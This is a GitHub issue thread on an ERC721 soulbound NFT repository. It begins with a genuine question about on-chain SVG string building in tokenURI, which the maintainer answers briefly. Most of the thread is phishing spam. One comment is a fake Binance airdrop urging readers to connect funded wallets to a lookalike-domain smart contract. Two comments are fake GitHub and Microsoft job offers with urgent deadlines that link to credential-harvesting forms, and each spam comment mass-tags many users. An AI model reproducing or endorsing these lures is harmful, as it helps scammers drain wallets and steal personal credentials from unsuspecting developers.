### ISSUE TITLE
Why there has these functions inside the code?

### ISSUE THREAD

**Issue by howardpen9** [kassandraoftroy/ERC721Soulbound#2]
1. What is the purpose to create a `new lens` here? (https://github.com/kassandraoftroy/ERC721Soulbound/blob/cd1a6e803bbb22521db3e1d0605f44da8f29f4f8/contracts/Spellbound.sol#L89)

<img width="998" alt="image" src="https://user-images.githubusercontent.com/36764495/178213648-59201dab-570d-45ab-bf47-d2b4247c4b5c.png">

2. For function `tokenURL`, why need these line of code to connect each Strings? Can you explain?
https://github.com/kassandraoftroy/ERC721Soulbound/blob/cd1a6e803bbb22521db3e1d0605f44da8f29f4f8/contracts/Spellbound.sol#L56

<img width="1394" alt="image" src="https://user-images.githubusercontent.com/36764495/178213781-1c26ba52-c8fc-494a-9680-9e94a55eff45.png">

Thank you.

**Comment by kassandraoftroy** [comment]
Yeah all of this part is just to create an on-chain svg image when someone calls tokenURI. There may be more optimized ways to do it, just made this part quickly

**Comment by Pawanpatidar99** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @nueverest, @pabloqpacin, @Rockstarrecords11, @georgerobescu, @yermukhanbet, @ChachiTheGhost, @ssantoshp

**Comment by mepcovenkat97** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
u-u-z, @vincentail, @chuanwu, @robertdigital, @jeromverschoote, @intosKai, @rubo, @Sergio-prog, @hadi-ilies, @KirillShaman, @arisac, @ChayuthCMKL, @blockchain-hcj, @FuradWho, @alexandesigner, @tonycurcuru7, @omasanori, @knightlore, @cannap, @0xChqrles

**Comment by leocsilva** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 6, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
jrynkiew, @tuif, @rubenhorn, @jeevanpillay, @chioarub, @KiselevMaxim, @EvanPiro, @f3d0ss, @matteoettam09, @HilliamT, @giviz, @zcong1993, @od-git, @liuser, @Potasya, @583181266, @juboyy, @createdbymahmood, @jiaohuangmao, @mikheevshow

**Comment by nueverest** [comment]
Hello,

I am the candidate you are looking for.
